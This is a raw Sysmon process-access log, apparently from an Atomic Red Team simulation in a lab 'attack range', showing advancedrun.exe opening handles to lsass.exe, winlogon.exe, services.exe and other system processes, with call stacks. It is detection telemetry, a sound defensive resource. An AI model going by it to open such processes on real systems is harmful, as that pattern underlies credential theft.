:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003983882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983872Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL